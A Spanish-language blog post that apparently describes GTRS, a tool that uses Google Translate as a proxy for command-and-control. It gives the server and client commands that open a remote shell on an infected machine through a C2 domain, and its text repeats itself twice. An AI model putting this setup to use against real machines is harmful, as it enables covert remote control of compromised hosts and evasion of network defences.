Matheus Bernardes ha publicado una curiosa herramienta escrita principalmente en Go que utiliza Google Translator como un proxy para enviar comandos arbitrarios a una máquina infectada.
Para probarlo simplemente necesitaremos un VPS con un dominio que hará las veces de C2.
Ejecutamos el script del servidor:
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
Como veis, el resultado de la ejecución del script nos dará una clave secreta que deberemos usar en el cliente. Este cliente podremos encontrarlo en Go o en Bash:
Cliente bash
Ejecutamos el cliente en un equipo con acceso a Google Translator, proporcionando el dominio y la clave secreta generada por el servidor.
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Ahora tenemos una shell interactiva que usa "named pipes" y, si, podemos hacer cd en los directorios.
Cliente Go
Primero debemos descargar el archivo binario o compilarlo, luego el proceso es igual al del cliente bash:
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Con este cliente tenemos la posibilidad de ejecutarlo en Linux, Mac y Windows, pero el cliente todavía no tiene una shell interactiva.
PoC
Para probarlo simplemente necesitaremos un VPS con un dominio que hará las veces de C2.
Ejecutamos el script del servidor:
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
Como veis, el resultado de la ejecución del script nos dará una clave secreta que deberemos usar en el cliente. Este cliente podremos encontrarlo en Go o en Bash:
Cliente bash
Ejecutamos el cliente en un equipo con acceso a Google Translator, proporcionando el dominio y la clave secreta generada por el servidor.
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Ahora tenemos una shell interactiva que usa "named pipes" y, si, podemos hacer cd en los directorios.
Cliente Go
Primero debemos descargar el archivo binario o compilarlo, luego el proceso es igual al del cliente bash:
./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Con este cliente tenemos la posibilidad de ejecutarlo en Linux, Mac y Windows, pero el cliente todavía no tiene una shell interactiva.
PoC
Url del video: https://youtu.be/02CFsE0k96E
Proyecto: https://github.com/mthbernardes/GTRS
Comentarios
Publicar un comentario